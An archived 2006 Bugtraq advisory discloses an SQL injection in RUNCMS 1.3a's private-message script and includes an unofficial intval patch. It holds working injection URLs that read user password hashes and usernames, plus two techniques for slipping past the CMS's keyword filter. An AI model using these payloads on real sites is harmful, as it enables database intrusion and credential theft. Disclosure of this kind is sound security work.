lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060216050015.26270.qmail@web33209.mail.mud.yahoo.com>
Date: Wed, 15 Feb 2006 21:00:15 -0800 (PST)
From: h e <het_ebadi@...oo.com>
To: support@...unia.com, bugs@...uritytracker.com,
	bugtraq@...urityfocus.com,
	"content-editor@...urityfocus.com" <content-editor@...urityfocus.com>,
	"editor@...urityfocus.com" <editor@...urityfocus.com>,
	"expert@...uriteam.com" <expert@...uriteam.com>,
	"news-editor@...urityfocus.com" <news-editor@...urityfocus.com>,
	"vuldb@...urityfocus.com" <vuldb@...urityfocus.com>,
	"vuln@...unia.com" <vuln@...unia.com>,
	"webmaster@...unia.com" <webmaster@...unia.com>,
	"webmaster@...urityfocus.com" <webmaster@...urityfocus.com>
Subject: RUNCMS 1.3a SQL injection


refrence:
http://www.runcms.org/public/modules/forum/viewtopic.php?topic_id=4003&forum=18
http://hamid.ir/security/
-----------------------------------------------
RUNCMS 1.3a SQL injection
Runcms Includes most things a webmaster would expect
from a cms: downloads, links, tutorials section,
polls, forums, news,
faq, contact form, rss feeds, file uploads, blogging
via xml-rpc, & more. Possibility to manage users as
groups with module/block specific access permissions,
and extend functioality via 3rd party module plug-ins
and ...
Original Author: The Xoops Project
http://www.xoops.org
http://www.runcms.org

Credit:
The information has been provided by Hamid Ebadi 
( Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:
http://hamid.ir/security/

Vulnerable Systems:
tested on  RUNCMS 1.3a  and  RUNCM 1.2 (and below ?)

Detail ::
Send Private Message
The following URL can be used to trigger an SQL
injection vulnerability in the pmlite.php [ but no
error will disply  ! ]
http://localhost/modules/messages/pmlite.php?send=1&to_userid=-1[SQL
INJECTION]

http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1
union select pass from runcms_users
internal RUNCMS protection will block this request and
redirect your browser to http://localhost/abuse.php 
and you will see this warning:

		" WARNING !!!!!! You were trying to abuse the
system, a logfile was created ..." 

what is the problem ? 
Bypassing  Protection :
as i underestand RUNCMS just filter  (union select)
and (union all select) and ....!  but they forgot 
(union       select)  !
exploit:
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
there is another way to bypass runcms internal
protection  simply add " /**/ "  in your query 
exploit will be something like this  :
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http://hamid.ir

Unofficial Patch:
line 33 : pmlite.php
$to_userid = !empty($_POST['to_userid']) ?
$_POST['to_userid'] : $_GET['to_userid'];
// Hamid Ebadi (hamid Network Security Team): patch
for RUNCMS 1.3a and below .
$to_userid=intval($to_userid); //add this line plz
HAMID
$send = $_POST['send'];



Signature
 


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ